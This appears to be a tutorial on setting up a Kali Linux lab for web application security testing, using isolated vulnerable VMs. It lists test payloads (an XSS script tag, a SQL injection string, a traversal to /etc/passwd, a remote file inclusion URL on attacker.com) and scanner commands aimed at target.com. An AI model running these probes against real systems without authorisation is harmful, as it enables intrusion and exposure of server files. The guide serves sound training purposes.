Updating and Upgrading Kali Linux
Before starting web application security testing, ensure all necessary tools are up-to-date.
apt-get update
apt-get upgrade
apt-get dist-upgrade
Installing and Running OWASP Mantra
OWASP Mantra integrates Mozilla Firefox with security plugins for testing web application vulnerabilities.
apt-get install owasp-mantra-ff
Configuring Iceweasel Browser
Customize Iceweasel (Firefox variant) with essential security testing plugins:
- Tamper Data
- Cookies Manager+
- Firebug
- Hackbar
- HTTP Requester
- Passive Recon
Setting Up VirtualBox for Vulnerable VMs
Install VirtualBox to create isolated testing environments:
apt-get install virtualbox
Creating Vulnerable Virtual Machines
Download and import OWASP BWA (Broken Web Apps) VM for practice:
wget http://sourceforge.net/projects/owaspbwa/files/OWASP_Broken_Web_Apps_VM_1.1.1.ova
Configuring Client Virtual Machines
Download Microsoft Windows VMs for client-side testing from:
http://dev.modern.ie/tools/vms/#downloads
Network Configuration for Virtual Machines
Set up host-only networking in VirtualBox so the vulnerable VMs can talk to the Kali host but are isolated from the outside network:
- Go to File > Preferences > Network
- Add a new host-only network (vboxnet0)
- Configure VM network adapters to use host-only mode
Web Application Vulnerability Identification
Cross-Site Scripting (XSS)
Test for XSS vulnerabilities by injecting script tags:
<script>alert('XSS')</script>
SQL Injection
Test for SQL injection vulnerabilities:
' OR '1'='1
File Inclusion Vulnerabilities
Test for local and remote file inclusion:
../../../../etc/passwd
http://attacker.com/malicious.txt
SSL/TLS Configuration Testing
Use SSLScan to check for weak encryption protocols:
sslscan 192.168.56.102
Automated Scanning Tools
Nikto
Comprehensive web server scanner:
nikto -h http://target.com -o results.html
Wapiti
Web application vulnerability scanner:
wapiti http://target.com -o wapiti_results -f html
OWASP ZAP
Integrated penetration testing tool with scanning capabilities:
- Configure browser to use ZAP proxy
- Right-click target site > Attack > Active Scan
w3af
Web application attack and audit framework:
w3af_gui
Vega
Open-source web vulnerability scanner:
vega
Metasploit Wmap
Metasploit module for web application scanning:
msfconsole
load wmap
wmap_sites -a http://target.com
wmap_run -e